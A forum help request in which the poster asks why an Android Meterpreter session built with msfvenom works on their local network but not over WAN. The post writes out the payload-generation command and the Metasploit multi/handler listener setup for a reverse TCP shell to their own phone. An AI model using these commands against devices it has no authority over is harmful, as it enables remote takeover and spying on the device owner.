WAN Meterpreter Session Using Msfvenom Not Working?

Apr 10, 2016 07:53 PM
635958894066680432.jpg

Hello,

So I'm trying to create a meterpterter session on my phone over WAN but it's not working. (It works fine on my local network)

I portforwarded the port 4444 to my local (linux machine) ip 192.168.1.123

Here are my portforward settings

635958894066680432.jpg

I create the payload using msfvenom

msfvenom -p android/meterpreter/reversetcp LHOST={MY PUBLIC IP ADRESS} LPORT=4444 R >/root/FILENAME.apk

and then install it on my phone

I start the meterpreter listener

msfconsole

use exploit/multi/handler

set payload android/meterpreter/reversetcp

set LHOST 192.168.1.123 //local ip

set LPORT 4444

exploit

An then run the app on my phone but it's not working

Help would be appreciated.

Just updated your iPhone? You'll find new Apple Intelligence capabilities, sudoku puzzles, Camera Control enhancements, volume control limits, layered Voice Memo recordings, and other useful features. Find out what's new and changed on your iPhone with the iOS 18.2 update.

Comments

No Comments Exist

Be the first, drop a comment!